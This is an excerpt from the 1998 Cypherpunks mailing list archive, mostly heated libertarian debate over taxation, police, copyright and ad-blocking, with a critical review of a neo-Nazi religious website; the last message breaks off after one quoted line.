> Date: Mon, 9 Nov 1998 16:16:15 -0800

> You know, guys, it doesn't matter what sort of tax system is set up, if it
> doesn't begin with one very fundamentally, essential, crucial, important point:
> respect for the sovereignty of the individual.   This means respect for their
> individual agreement, their informed consent, to any arrangement to be taken up
> by them.
> 
> If, at any point in time - either before, during, or after a plan for obtaining
> moneys from citizen-units is instigated - it loses sight of the purpose for
> setting up the whole thing, then it's worthless anyway.  If it doesn't support
> the highest ideal of humanity - unit by unit, individual by individual, human
> beings qua their separate existence  - then it is not serving their purposes,
> but only the purpose of those who identify themselves as the State: employees of
> the State, leaders of the State, keepers of the State, goalies of the State,
> wards of the State, etc.

Jesus, it's a miracle. Blanc and I actualy agree....I think I'm gonna faint.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Tue, 10 Nov 1998 13:17:34 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: NSA Threatens To "OUT" Republicans Over Hubbell Investigation
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B277@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




Yes, I assumed as much. But it is electronic circuits that are EMP/nuclear
hardened, not the "encryption technology." We have a populace that doesn't
understand what cryptography is, such reckless statements don't help,
especially putting nuclear and encryption in the same sentence.

For as much as I hate Clinton, encryption is mathematics, period. National
security fearmongering to spite Clinton does not help the encryption
awareness/freedom campaign.

	Matt


> -----Original Message-----
> From: Harvey Rook (Exchange) [mailto:hrook@exchange.microsoft.com]
> 
> An advanced, nuclear hardened encryption device, is an 
> encryption device that will still work after a nuke has 
> gone off in the vicinity. Nuclear bombs emit EMP's which 
> destroy sensitive electronics.
> 
> Harv.
> 
> > -----Original Message-----
> > Uh, what in the hell is "advanced, nuclear hardened, 
> > encryption technology"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Tue, 10 Nov 1998 13:25:41 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: How to solve the tax problem w/o anarchy or force (fwd)
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B278@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




> > nihilistic so much as they have come to the conclusion that 
> > to ignore and/or subvert government has higher probability 
> > of success than trying to reform it -- much to the demise 
> > of the Libertarian Party.
> 
> There is certainly little historical evidence to support such 
> a thesis.

My thesis that this is a common sentiment? Who the @#%$ is talking about
history, try looking around. No, I'm talking 1950's to present, and
particularly 1990's and the internet-libertarian culture. I think this
sentiment is historically unprecedented.

The thesis that to ignore the nation-state will see it's demise? Well we
really need a financial system that they don't control, which has been
promised with financial cryptography but has yet to arrive. I don't think
it's time to throw in the towel yet.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 11:36:05 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: How to make non-neutral charge batteries...
Message-ID: <199811100313.VAA15569@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



One way a person could generate a battery suitable for the spark gap
experiment to address the conservation of charge issues related to the
battery is to build a mechanism such as:


                2N e-          1N p+

                     |       |
                     |       |
       |-------------|       |--------------|
       |             |       |              |
       |             |       |              |
       |                                    |
       |                                    |
       |------0 0------------------0     0--|
                                    \
                                      \
           spark gap               switch

The two vertical plates above are not a capacitor. They simply represent
some mechanism to hold charge, Leyden Jars for example.

Now when the switch is closed 1 N of e- will combine with 1 N of p+ to form
a neutralization of charge. That will leave a net 1N of e- that will
represent a point charge of that value. That charge will be exposed at the
right contact of the spark gap above.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Tue, 10 Nov 1998 11:44:21 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)
In-Reply-To: <199811100205.UAA14919@einstein.ssz.com>
Message-ID: <v04011710b26d49ef9fd1@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:05 PM -0500 11/9/98, Jim Choate wrote:
>Forwarded message:
>
>> Date: Mon, 9 Nov 1998 15:27:14 -0500
>> From: Petro <petro@playboy.com>
>> Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
>>  (fwd)
>
>> 	No, it's that facists & socialists like yourself think we should be
>> happy letting you decide what our social responsibilities are.
>
>Actualy, no. I'm perfectly happy to let you run around paying no taxes on
>your income. The part you're not going to like is that I'm also not going to
>let you reap one iota of benefit from those systems that are built and

	Like I said (it's that reading and comprehension thing, kinda like
my spelling thing), I don't mind paying fair costs, I do mind paying
extortion at the point of a gun.

>developed by those of us who do pay taxes without a cost. And the cost will
>be more than what the necessary taxes would have been. Hell, a free-market

	Prove it. Prove that in a competitive market certain goods and
services will be MORE expensive than in a Government-as-Supplier.

	How many Corporations you know buy $300 hammers, or $1000 toilet
seats?

>capitalist shouldn't begrudge a tidy profit anyone under any situation.

	I don't begrudge a profit where it's due. Bill Clinton isn't due.
Neither is Newt Gingrinch, or any other Feeding at the government trough
pig.

>> 	I am perfectly willing to pay for a police force. A police force
>> that arrests ALLEGED rapists, treats them like human beings until found
>> guilty and then deals with them as the law indicates. I am NOT willing to
>> pay for a police force that spends most of it's time (well, aside from
>> eating doughnuts, drinking coffee and collecting bribes) chasing after
>> teenagers with illegal chemicals. I am not willing to pay for a police
>> force that extorts money from these same teenagers. I am not willing to pay
>> money for a police force that thinks it needs to arrest people for
>> "loitering", "Mob Action", when it's defined as more than 4 people standing
>> together in a public place, and ESPECIALLY when EVERY TIME THEY ARREST
>> SOMEONE, IT'S THROWN OUT OF COURT.
>
>Neither am I, unfortunately paying taxes or not won't resolve those sorts of
>issues. What is required is public over-watch groups (as was recently
>implimented in Austin, pisses the cops off big time) and a change in the way
>we run our prisons. As to the way people are currently treated prior to
>being found guilty at a trial is an abuse of power on the part of those
>parties involved and clearly cruel and unusual punishment for an innocent
>man.

	So, they don't get fired (usually) they don't get more than censured.

>Of course the *REAL* problem isn't the police. It's the people who make the
>laws that the police are sworn to uphold and the judges with a social agenda

	No, the problem is the police. To quote (IIRC) Lydia Lunch:

	"Neo Nazis with night stick dicks, no brains but banging into yours
in the middle of the night looking for whatever don't fit in with their
ideologically unsound version of reality".

	Also known as "You wanna act like a fuck'n gang banger, I'm gonna
treat you like a fuck'n gang banger" to two teenage black males who (like
every other black male in the neighborhood) had learned to walk around the
corner when the cops drove by.

	The cops in the larger cities are so fucken dirty that a "citizens
oversight commision" will either be a politically packed joke, or wind up
changing members every couple months from attrition.

>That process *is* most certainly an ideal place to inject consideration and
>respect for civil liberties and the purvue of government institutions.

	Oh, and that has been working OH SO WELL thus far.

>
>> 	I am willing to pay for the streets I use. I am not willing to pay
>> the same fees to ride my bicycle (my current primary form of
>> transportation) as you do to drive your 2 ton SUV.
>
>And you probably don't now (Does a Bronco II weigh 2 tons?). In actuality
>you don't pay the gas taxes, the vehicle registration, license fees,
>inspection, requisite insurance, etc. for your bicycle. I bet you don't even
>have to license your bike to ride it on the city streets.

	No I don't. but check the numbers, there is a $6000 LESS collected
in road taxes (average) PER CAR for each car in america. That $6k comes out
of my pockets as well, and as a bicyclist I my share is MUCH less than that
of a Bronco. Not to mention that I don't pollute anywhere near as much, if
at all.

>> 	I am willing to pay for fire protection. I am not willing to pay
>> for "universal health care", "welfare", and other such nonsense.
>
>The Constitution happens to mention that the federal government is detailed
>with taking care of the general welfare. If you don't like that sort of stuff
>then get a Constitutional amendment passed.

	If that is the interpretation, then the document is morally flawed.

>> 	In other words Jim, Fuck You. I, and I'd bet most people here,
>> including Mr. May, are perfectly willing, and hell even eager to pay their
>> share, to assume their social responcibility, they just get very, very
>> angry at having to pay OTHER peoples social responcibility, and get very,
>
>Unfortunately, that is what social responsibility is - giving with in
>personal gain. That ultimately is what drives the bee up your butt.

	Yeah, having to support the lifestyle habits of others really DOES
beef me. I pay *MORE* than my way, and I *WORK HARD FOR IT* (all jokes
aside). Others do NOT HAVE THE RIGHT TO MY LABOR.

	That is slavery, pure and simple. No constitutional gobblygook can
change that.

>
>> very angry at having to pay for other shit (Senate Luncheons and Swimming
>> Pools, the Militaries greatly inflated budget, all the waste that is todays
>> federal government).
>Agreed. Throwing the Constitution away won't fix that and going to a
>free-market monopolistic no-social-responsibility-at-all system such as
>anarcho-capitalism is sure won't do it.

	Sure it will.

>> 	Yes, but a state can kill those who don't wish to be governed. Can
>> and does routinely.
>
>Oh what hyperbole. You make it sound like the Nazi's have invaded. They
>haven't. Yes, there are misguided people out there. Yes, there are just
>plain old corrupt people out there. That won't change irrespective of the
>political system (or lack of one). They don't just go out and pick people
>off the street and shoot them you're over-reacting and succumbing to a
>paranoid delusion of persecution.

	How many millions have died in the last 100 years IN wars started
by and for the advantage of the state?

	How many died at the hands of Stalin, Hitler. and other dictators?

	The state, whether here in the US, or in other countries tends to
treat the humans that comprise it with little concern for their health or
livelyhood, and the ugly truth is that the same characteristics that are
necessary to keep a government in line are the same ones that make a
government unnecessary.

	If you have citizens that are honest, principled, and willing to
assist those around them, you have no need for a "state".

	Without honesty and principles you have Slick Willy.

>Unless you kill somebody or move a few tons of coke your individual chances
>of being killed by the state is less than being struck by lightening.

	There are 1.7 million people struck by lightning every year?

	I am not going assume that our country is any better just because
it's subjects are my neighbors. No, we don't kill as many, but name one
country that has jailed more of it's subjects, and the truth is, we are
getting worse.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 11:55:29 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: How to solve the tax problem w/o anarchy or force (fwd)
Message-ID: <199811100336.VAA15683@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "X" <xasper8d@lobo.net>
> Subject: RE: How to solve the tax problem w/o anarchy or force (fwd)
> Date: Mon, 9 Nov 1998 11:31:00 -0700

> Sorry, everyone, for this crap coming up, but JIM CHOATE wants you all to
> see it...
> 
> Jim,
> 
> You keep reposting this to the cpunx list, and I keep trying to discuss it
> with you in private.

I have zero desire to discuss this in private. If you don't want to discuss
it here then we won't discuss it.

> Correct me if I'm wrong, but the gist of your system was a two-tiered
> payment schedule where Group A could be called TaxPayers and Group B could
> be called NON-Payers.  Right?
> 
> And basically, Group A would get all of the benefits that a fully paid
> membership would entail, right?  Secondly, Group B would "not pay taxes" and
> would NOT be entitled to any benefits save for on a pay-as-you-go type
> arrangement.  Right?
> 
> What USGov't services do you include in your proposal?

Each and every one of them, except the criminal courts. I would include the
state and local government as well.

Perhaps you could think of it as a discount card....;)

> (feel free to jump in with some more.)

You're doin' fine.

> U.S. Mail services

If you don't show them your tax receipt before Jan. 1 of each year they will
remove your address from their delivery list until you do so. If you don't
either pick it up there in person within 10 days, every 10 days it goes back.
The Constitution says they have to deliver your mail. It doesn't say they
have to drop it on your front step.

Personaly I think this would be a great position for those folks who have
learning disabilities but still need a job. The irritation factor alone would
be worth it...;)

> Common defense

Already covered that one.

> Air traffic controlling

When you buy your ticket from a commercial carrier and don't present a tax
receipt your ticket price goes WAY! up.

> roadways and interstates

Already covered them too.

> Food and Drug Administration approvals

When you buy food or drugs if you don't present your tax receipt then you
pay the full price for foods and drugs.

> Federally mandated minimum wage

I also covered this one already.

> automobile safety standards

See the one above.

> Is your tax progressive or regressive?

Depends on what *you* mean by progressive or regressive. Personaly I would
go for a flat tax rate but a scaled mechanism would be ok. It isn't the
particular scaling mechanism that I dislike about our current tax system.

> If I'm right so far (which I may or may not be) then we have to talk about
> your definition of "paying taxes."

Taking a percentage of your monetary income each period (say a year) and
sending it to an address. That address is the suitable tax agent who then
distributes the monies into the appropriate account according to law. The
suitable civic agencies can then draw funds according to law.

> Does a single woman raising five kids
> and paying a small mortgage making  $14,200 per year pay taxes?  No,
> unfortunately for her, she doesn't.  I guess that puts her smack into GROUP
> B!  Well, that's simple enough!

Not at all, simply because she is unfortunate enough not to have the income
necessary to participate without causing harm to herself and her family
(perhaps) is no reason to deny her those rights. I'd give her a receipt that
would look just like anybody elses. Now if she didn't want to apply for it
by sending in the paperwork that's her decision. From a government
perspective she is participating fully in the process, it isn't the amount
of money (as foreign as that may be to eco-anarchists and free-market
mavens) that is the issue but the willingness to participate. Nobody is
forcing her to do anything, it's all of her own volition.

> We'll deny her the creature comforts of the
> list above until she chips in her proportionate cost, right?  When that
> libertarian bitch tries to send mail, we'll charge her more!  WHen she gets
> on the freeway, we'll toll her!  When she buys a medicine for her snot-nosed
> urchin, we'll give her the stuff that ain't been FDA approved, right?
> RIGHT!  And, if ever we should need to attack another country (or defend
> ours, as you pointed out) SHE'LL happily volunteer to serve (as I remember
> your post) in order to protect her TAX-FREE STATUS.

No, that isn't right. As to participating in the military, no I didn't give
anyone a choice. I said *draft*, you didn't give up your citizenship when
you gave up your tax participation. Now if you want to give that up to then
we won't draft you but you'll be one broke puppy trying to pay all the
bills as a non-tax-participant and a non-citizen.

> As you said to me, she's probably just looking for someone to shoulder her
> part of the load, right?

I said to you?

> You said it would be easy to implement, right?  I don't see that it would be
> easy at all.

As hard as this may be to take, your ability to see it doesn't effect it's
viability.

> Once again, I apologize for the OFF TOPIC nature of this, but MR. COHATE
> (freudian slip, or merely coincidence?  you be the judge!) insisted on
> duking this out in public.

Um, actualy YOU responded to my post. I didn't start this with you.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Tue, 10 Nov 1998 14:09:29 +0800
To: "'Cypherpunks Distributed Remailer'" <cypherpunks@einstein.ssz.com>
Subject: RE: How to solve the tax problem w/o anarchy or force (fwd)
In-Reply-To: <199811100254.UAA15502@einstein.ssz.com>
Message-ID: <000901be0c6d$50fd51e0$618195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Jim inChoate:

: Jesus, it's a miracle. Blanc and I actualy agree....I think
: I'm gonna faint.
...................................................


Eureka, success.
Keep it in mind.   Everything I ever said that you disagreed with relates to
that post.


   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 12:26:10 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <199811100403.WAA15755@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 9 Nov 1998 21:13:57 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
>  (fwd)

> 	Prove it. Prove that in a competitive market certain goods and
> services will be MORE expensive than in a Government-as-Supplier.

Ok. Let's use the example of fire stations and insurance companies that came
up earlier.

What do you suppose the impact on the bottem line will be by increasing the
amount of non-income-producing-services that such a situation would require?
Each insurance company would be responsible for many, many stations
scattered all over the country. This means some sort of centralized
mechanism to create policies and other procedures and their requisite costs.
Now, consider what that means to the payment each policy holder is going to
have to deal with. It's going to be large because it's going to have to take
up for parts of the company that don't bring in policy income but still
require service coverage.

Now by distributing this system out and assigning it to governments and
providing equitable service to all, no questions asked they're there we, we
get a system that is reasonable in cost and provides good responce.

And we don't have to pay the insurance company a bunch of money to do a job
they don't want to do (otherwise they'd be in the fire fighting business and
not the insurance business).

> 	How many Corporations you know buy $300 hammers, or $1000 toilet
> seats?

Lot's of them throw good money after bad. All businesses do. It's human
nature. I know of one company that got so carried away with spending for
little dribbles and drips that they ended up having to stop hiring new
employees that the company desperately needs. I used to work for one,
Compu-Add, that led to its final demise.

> >capitalist shouldn't begrudge a tidy profit anyone under any situation.
> 
> 	I don't begrudge a profit where it's due. Bill Clinton isn't due.
> Neither is Newt Gingrinch, or any other Feeding at the government trough
> pig.

Agreed. But the solution is term limits on Congress-critters and a
re-vamping of some critical laws.

> 	No, the problem is the police. To quote (IIRC) Lydia Lunch:
> 
> 	"Neo Nazis with night stick dicks, no brains but banging into yours
> in the middle of the night looking for whatever don't fit in with their
> ideologically unsound version of reality".

Well I happen to come from that sub-culture so I can speak from experience.
The majority of times I or my friends were hassled we were asking for it.

Knowing Lydia's reputation I'd suspect she'd agree.

> 	The cops in the larger cities are so fucken dirty that a "citizens
> oversight commision" will either be a politically packed joke, or wind up
> changing members every couple months from attrition.

If anything interesting happens here in Austin with the new over-sight group
I'll send a pointer.

> >That process *is* most certainly an ideal place to inject consideration and
> >respect for civil liberties and the purvue of government institutions.
> 
> 	Oh, and that has been working OH SO WELL thus far.

No, and that's my point.

> 	No I don't. but check the numbers, there is a $6000 LESS collected
> in road taxes (average) PER CAR for each car in america. That $6k comes out
> of my pockets as well,

How the hell do you figure that one? It may come out of YOUR state taxes but
it certainly doesn't come out of mine (I don't have state taxes). The funds
for road and such is collected solely through gasoline and auto related
sales taxes in Texas.

Perhaps you should fix your state government...

Now if you're talking about the federal taxes for roads, that has NOTHING to
do with your or my driving vehicles on those roads. It has to do with a
program implimented in the early 20th century to create a good road net in
the US for military use. The taxes are justified in principle, if not in
amount, through commen defense.

> 	If that is the interpretation, then the document is morally flawed.

Interpeted?

  
We, the People of the United States, in order to form a more perfect Union, 
establish Justice, insure domestic Tranquility, provide for the common 
defence, promote the general Welfare, and secure the Blessings of Liberty to 
ourselves and our Posterity do ordain and establish this Constitution for the 
United States of America. 
 
> 	How many millions have died in the last 100 years IN wars started
> by and for the advantage of the state?

Most of the wars of this century were started either by people acting in
concert willingly (eg Nazi Germany) or pure accident (eg Prince Ferdinand
has already lived through one assissination attempt, a reasonable man would
have gone home).

> 	How many died at the hands of Stalin, Hitler. and other dictators?

A lot more than at the hand of honest people, which is my point as well.
These were people, not governments. The citizens willingness to participate
aided and abetted each and every one of them and weakens your use of them in
your defence.

> 	The state, whether here in the US, or in other countries tends to
> treat the humans that comprise it with little concern for their health or
> livelyhood,

Yep, I see lots of that every day. In one hand you complain about welfare
and then in the other claim that the state is uncaring. Can you please make
up your mind?

> 	If you have citizens that are honest, principled, and willing to
> assist those around them, you have no need for a "state".

Yeah, and if frogs has wings they wouldn't bump their butt when they jumped.

If your process relies on this it's doomed from the get go. This ain't
Vulcan.

> 	Without honesty and principles you have Slick Willy.

And Bubba next door as well as that face that stares out at you every
morning.

> 	There are 1.7 million people struck by lightning every year?

There aren't 1.7M poeple killed in the US by the LEA's. That would be about
1-in-150. There are several hundred people killed by lightening each year in
the US. The number of people killed in activity complicent with LEA's is
probably not a great deal (at most an order of magnitude) over that.

> it's subjects are my neighbors. No, we don't kill as many, but name one
> country that has jailed more of it's subjects, and the truth is, we are
> getting worse.

Agreed, one of the reasons I support this mailing list and my local
activities.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 12:43:21 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: How to solve the tax problem w/o anarchy or force (fwd)
Message-ID: <199811100426.WAA15835@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: How to solve the tax problem w/o anarchy or force (fwd) 
> Date: Mon, 09 Nov 98 14:10:11 -0800
> From: "Vladimir Z. Nuri" <vznuri@netcom.com>

> Jim: the govt is the way it is because the sheeple of this
> country have let it get out of control for many decades.
> the idea that "someone else handles that stuff" has infected
> our consciousness. govt is something WE handle if we want
> a good one. if you want something done right, do it yourself.

I agree in principle. I also believe though that the people who are taking
advantage of the peoples character (it's mentioned in the Declaration of
Indipendance) do so in a pre-meditated way. The people may bear some blame
but they're not doing it out of malice and malpheasance.

> cpunks actually contribute to this problem with their nihilistic
> philosophy in general. the msg is that it is a waste of time
> to engage in group activity or political discourse or lobbying
> against the govt or organization or *whatever*... it's actually
> just a variant on the sheeple passivity. sheeple are like, "that's
> not my job". cpunks are like, "it is a waste of time and energy
> to do that job". what's the difference in the end??

It's like those punk kids dressed in leather, tatoos, and pierced body parts
yammering about being different, yet they all look the same.

> the govt can be turned around very, very quickly if the public
> stops sucking down sixpacks and being hypnotized by meaningless
> dribble of sporting events and sitcoms that parade endlessly
> across their nanosecond attention span. maybe they might read
> even more than a comic book or pornographic magazine some day.
> the political class *intentionally* created this bread and
> circus atmosphere and are hiding behind the scenes as we
> speak. no dorothy do not look at the man behind the curtain.

I agree. Though I don't believe it necessarily requires the majority to do
it. If it does then we may be doomed before we even start. As long as the
government recognizes in any shape, form, or fashion that majority rule is
limited by individual rights there is a chance that a small group dedicated
and forthright can overcome.

> who seek it. "when the student is ready the teacher will appear"

God, ain't that the truth. I'm drowning in the damn books trying to keep up
with just a couple of my personal interests.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 10 Nov 1998 08:31:04 +0800
To: declan@well.com
Subject: fuck copyright (Re: Advertising Creepiness)
In-Reply-To: <199811090115.RAA23804@smtp.well.com>
Message-ID: <199811092238.WAA06689@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Declan McCullagh writes:
> Whether you love or hate current copyright laws, it's a stretch to argue
> that it's legal to republish (by forwarding) articles in full.

Who cares if it's legal or not.

Copyright only "works" to the extent of readers good-will
(beggarware/shareware approach "please don't copy") and to the extent
that thugs from your local force monopoly can enforce it at gun-point.

I think the conclusion of crypto-anarchy is that copyright seems
unlikely to survive as a schelling point for making money from
publications.

You can make money from information provision by charging extra for
up-to-date news, or by charging so little that the cost from the
original provider is so low that it's not worth anyones time to
redistribute it, or by providing higher bandwidth connection to the
net than the mirrors, or by making do with click throughs from the
percentage of people who use the original rather than the cheaper
mirror.

Recursive auction market is a statement of reality if you make things
too expensive to the reader.  Overdoing the banners may be overdoing
it already, viz the banner stripping attempts.

The problem from wireds point of view is that they want their 1% click
through rate to derive their funds.  But that is their problem, and
for them to develop strategies for obtaining funds in this landscape.
To say it's "not legal to republish" is saying what? that you think
thugs with guns should enforce bit flow controls?  That wired plans to
make use of these force monopoly services?

I agree with Jim and Vladimir, I find it annoying to see URLs only,
and the teasers (5 lines telling cut off just where it may or may not
get interesting) are irritating too, as they tell you almost nothing.

I'd rather see nothing or someone summarise or post the whole thing,
or at least the interesting bits if it is highly relevant.  Mostly it
is just background clutter, most "news" isn't interesting at all.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Quirk <quirk@cyberpass.net>
Date: Tue, 10 Nov 1998 15:09:20 +0800
To: cypherpunks@cyberpass.net
Subject: an odd one at pub.anonymizer
Message-ID: <Pine.SOL.3.96.981109224331.25593G-100000@cyberpass.net>
MIME-Version: 1.0
Content-Type: text/plain




--mark--
-hedges- reviews http://pub.anonymizer.com/~lcchrist

The National Socialist Church of Christ espouses a turning away from the
old era figuring Hitler and the current Destruction of the Earth Part II
as the antichrist ending the cycle of Pisces. In the next phase of polar
angular orientation we will understand each other, the universe, and grow
into what we can be, because we figure out that otherwise we'll kill us
all. They demand spiritual revolution. Therefore they demand obscene
gestures and French Soltiers flipping dead cows with catapults at the
Brits looking for the Holy Grail. They are not centric on any ism but
expand their inclusiveness of what is sacred: the universe. Here I would
speak of Godel and the beauty of the semi-organised chaos / order /
balance / contrast forms inherent in the universe. In their site the
message remains that Destruction is a necessary force in the world from
time to time. That induces a feeling of condonence, not condolences.

The site plays some interesting games with a lot of very uplifting
philosophy for the understanding of the Holocaust and the genocide which
occurs today, but then, using Biblical reference and passive-voice claims
to the legitimacy of prophecy, it portrays Jesus risen again as Hitler:

"Christ had warned us that when He would return, He would come as a thief
in the night. Indeed, it had been prophesied that no man would know the
day or the hour of His return. Indeed, no one could ever have expected
that the Second Coming of Christ would mean His return to play the
completely opposite role that He had played before, coming not to save the
world, but to be its judge, baptizing not with water but rather with fire
and force!  The Second Coming of Christ came in such a completely
unexpected fashion that mankind remained completely unconscious of His
return and the fulfillment of Christian prophesy for more than fifty
years!" 

The speaker is anonymous and does not provide the contact address.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 10 Nov 1998 08:40:06 +0800
To: tcmay@got.net
Subject: Re: Advertising Creepiness
In-Reply-To: <v03130305b26bf42e91fd@[209.66.101.228]>
Message-ID: <199811092247.WAA06698@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Tim May writes:
> I expect banner ads to die out soon enough. The technology is just too
> amenable to filters.
> 
> Adbusters for television have been talked about for years, but I know of no
> reliable adbusters...and an adbuster for t.v. doesn't save too much (since
> the 2-minute or whatever gap is still there). Taping and then
> fast-forwarding through ads is probably more convenient than an adbuster in
> realtime.

I think the idea of fast-forward for a TV would be a nice product.
Say that you had a high capacity video CD hooked up to TV.  Record it
all in a rolling backup of the weeks TV.  Then you can skip around,
forward over junk (ads, unintersting patches).

Probably you could combine with VCR+ or programme list to prune down
the bandwidth/capacity requirements by indicating disinterest and
interest, topic preferences etc.  

Possibly a setup like this is getting closer to feasible with storage
improvements.

> But for the Web, the arms race between adbusters and ad providers...seems
> likely to be lost for the ad makers.
> 
> Once some mainstream adbusters appear.
> 
> I wonder if advertisers will try to cite some right to enjoin ad
> busters from busting their ads? (Far-fetched, perhaps. But imagine
> if a particular version of this filtering occurrred...imagine the
> howls if Microsoft Explorer automatically filtered out the ads of
> companies it disliked or was competing against? Legal? Restraint of
> trade?)

A new feature for some enterprising cyberspace business to provide via
eternity servers perhaps -- mirrors of subscriber services, and banner
stripping.  Free, but account based subscriber services are annoying,
eg microsoft recently stuck about 5 mins worth of forms to fill in to
get at support for some thing you've already paid for, forcing you to
give them free user survey material.

I fill it in as Billzebub billg@microsoft.com etc., plus random
meaningless answers so that they get dud survery info, and so that his
secretary gets to filter the crufty ads.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 10 Nov 1998 08:33:57 +0800
To: declan@well.com
Subject: Re: IP: Crunch Time for Y2K Suppliers (fwd)
In-Reply-To: <199811090310.TAA18290@smtp.well.com>
Message-ID: <199811092255.WAA06718@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Declan McCullagh writes:
> I'm not sure I like intellectual property laws in general -- like some
> libertarians, I might prefer a contract-based system. But for now I support
> civil laws to punish copyright infringements, and it seems to me it's
> difficult to argue that redistributing entire articles isn't one.

Ah good -- I thought you'd taken leave of your cypherpunkly senses for
a moment there!  (re my `fuck copyright' post).

> Besides, and more importantly, it's also rude.

That it might be, if it is a social says that it is polite to honor
peoples requests about bit flow.

But hey, if more and more people find ignoring the supposed social
convention convenient, then perhaps this social convention isn't as
widely adhered to as people making money off subsidized copyright
enforcement thugs might like to claim it is.  ie. IMO social
conventions on copyright are moving, and quite fast.  And copyright
has a hidden cost which we are all paying for.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 10 Nov 1998 08:38:14 +0800
To: vznuri@netcom.com
Subject: Re: How to solve the tax problem w/o anarchy or force
In-Reply-To: <199811090528.VAA01234@netcom13.netcom.com>
Message-ID: <199811092311.XAA06732@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Vladimir writes:
> what we really need is a government which can personalize its
> services, and people pay for what they use. 

